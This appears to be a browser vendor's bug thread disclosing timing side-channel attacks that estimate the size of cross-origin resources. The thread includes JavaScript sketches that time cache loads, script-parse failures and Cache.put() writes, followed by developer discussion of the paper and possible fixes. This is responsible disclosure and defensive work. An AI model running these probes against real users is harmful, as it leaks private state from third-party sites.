User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36

Steps to reproduce:

We found that many APIs that handle remote resources expose a timing side channel that allows an attacker to estimate the size of a resource. In our paper (https://vagosec.org/papers/timing-attacks_ccs2015.pdf) we describe four cases where an attacker can obtain timing measurements related to the size of an external resource. The key difference from other web-based timing attacks is that the timing measurement starts *after* the resource has been downloaded. As a result, the measurement is not affected by network conditions and is therefore (in most cases) much more accurate.

One of the attacks uses the time the browser needs to load a resource from the cache (after it has been forcefully added there using an Application Cache manifest) as an estimate of its size. I've made a quick demo showing that it's trivial to differentiate between files of different sizes: https://vagosec.org/labs/timing-attacks/cache-load-time-example.html (for my own convenience the files are same-origin, but it works the same way with cross-origin resources).

Actual results:

The time required to handle a resource (whether parsing, storing, or retrieving it) is related to the size of that resource. This leads to a side-channel attack that can be used to infer information about the state of a user at a third-party website (have a look at the paper for some real-world cases).

Expected results:

Not sure what should happen, but it shouldn't be possible to differentiate between two resources whose sizes differ.
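For reference, the measurement behind the demo boils down to something like the following browser-only sketch (not the demo's actual code; the URL and sample count are placeholders, and it assumes the target resource has already been forced into the application cache via a manifest):

```javascript
// Browser-only sketch: estimate a cached resource's size from its load time.
// Assumes the resource is already in the application cache, so the load below
// is served from disk and is unaffected by network conditions.
function timeCacheLoad(url) {
  return new Promise((resolve) => {
    const start = performance.now();
    const img = new Image();
    // onload fires for images, onerror for non-image resources; either way
    // the body has been read out of the cache before the handler runs.
    img.onload = img.onerror = () => resolve(performance.now() - start);
    img.src = url;
  });
}

// Repeat the measurement and take the median to filter out scheduling noise.
async function estimateLoadTime(url, samples = 20) {
  const times = [];
  for (let i = 0; i < samples; i++) {
    times.push(await timeCacheLoad(url));
  }
  times.sort((a, b) => a - b);
  return times[Math.floor(times.length / 2)];
}
```

Comparing the median load times of two candidate resources is then enough to tell apart files whose sizes clearly differ, which is what the demo page illustrates.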
Dan, thoughts here?
I skimmed through the paper; here are my first impressions. As comment 0 says, the main idea is timing attacks that involve loading resources (often loading HTML with something not meant for HTML) but that do not depend on network download speed. The four cases described in the paper are:

1. Video parsing (page 3). The paper says Firefox is unaffected because it doesn't try to parse files with incorrect Content-Type headers.
2. AppCache (page 4). Timing how long it takes to load the resource out of the cache.
3. Service Workers (page 5). This uses the Cache API and sounds similar to the AppCache case.
4. Script parsing (page 5). Download an HTML file as JS and see how long it takes to load. It will probably throw a syntax error, but the time it takes still leaks information about how big the file is.

To get higher precision, they rapidly request the resource over and over, and on non-Firefox browsers there is an optimization that will make only a single request for all of those. So Firefox is going to be more affected by network choppiness. These are all pretty DOM-y, so I'm going to move the bug there for now.
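The principle behind case 4 can be sketched outside the browser too. This is not the paper's attack code, just a synthetic illustration: the payloads stand in for a downloaded HTML file, and the block comment forces the tokenizer to scan the whole payload before it hits the guaranteed syntax error at the end.

```javascript
// Sketch: time how long the JS engine spends rejecting a non-JS payload.
// Even though parsing always fails, the duration depends on how much of the
// payload the engine scans first, which leaks information about its size.
function timeParseRejection(source) {
  const start = process.hrtime.bigint();
  try {
    new Function(source); // parses (and rejects) without executing anything
  } catch (e) {
    // SyntaxError is expected: the payload is not valid JavaScript.
  }
  return Number(process.hrtime.bigint() - start); // nanoseconds
}

// Synthetic stand-ins for small and large downloaded files; the trailing '('
// guarantees a SyntaxError only after the whole comment has been scanned.
const smallPayload = '/* ' + 'a'.repeat(1_000) + ' */ (';
const largePayload = '/* ' + 'a'.repeat(5_000_000) + ' */ (';

console.log('small:', timeParseRejection(smallPayload), 'ns');
console.log('large:', timeParseRejection(largePayload), 'ns');
```

As in the paper, a real measurement would repeat this many times and aggregate, since a single sample is noisy.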
For fetch(), you can only observe the timing of an opaque response body if it's consumed in a service worker and then passed to FetchEvent.respondWith() for something like an <img> element. The fetch() promise itself resolves when headers are available, not when the body is fully downloaded. The same is true for reading an opaque response from the Cache API. You can, however, infer body size from Cache.put() and Cache.add(), since the promise resolves only once the body is fully written to disk.
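To make the Cache.put() observation concrete, a browser-only sketch (the cache name and URL are placeholders; the Cache API is available from window context as well, not only from service workers):

```javascript
// Browser-only sketch: the promise returned by cache.put() resolves only once
// the response body has been fully written to disk, so its duration correlates
// with the size of an otherwise unreadable opaque response.
async function timeCachePut(url) {
  const cache = await caches.open('probe'); // 'probe' is an arbitrary cache name
  const response = await fetch(url, { mode: 'no-cors' }); // opaque cross-origin response
  const start = performance.now();
  await cache.put(url, response); // resolves after the body is written
  const duration = performance.now() - start;
  await caches.delete('probe'); // clean up between measurements
  return duration;
}
```

Note that the timing starts only after fetch() resolves, i.e. after headers arrive, so the write duration mostly reflects body size plus disk I/O rather than network conditions.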
Changing the summary to the paper title so when people start searching for it after next week (http://www.sigsac.org/ccs/CCS2015/pro_paper.html) they'll have a better shot at finding it. This isn't an issue Firefox can solve on its own; much of it is inherent in the design of the features. After the paper is published we can work with Chrome folks and other browser vendors to see if there are any reasonable ways to address this, and unhide the bug at that time (since the paper will be public).
The paper has been published in the meantime. Personally, I am in favour of a structural fix, to the extent that one is deemed possible. While the paper discusses four different attacks, it's quite likely that I missed some things, or that new browser features will introduce new timing side channels (for instance, if SRI didn't require CORS, which was added for reasons unrelated to timing side channels, it could be leveraged to provide very stable timing measurements).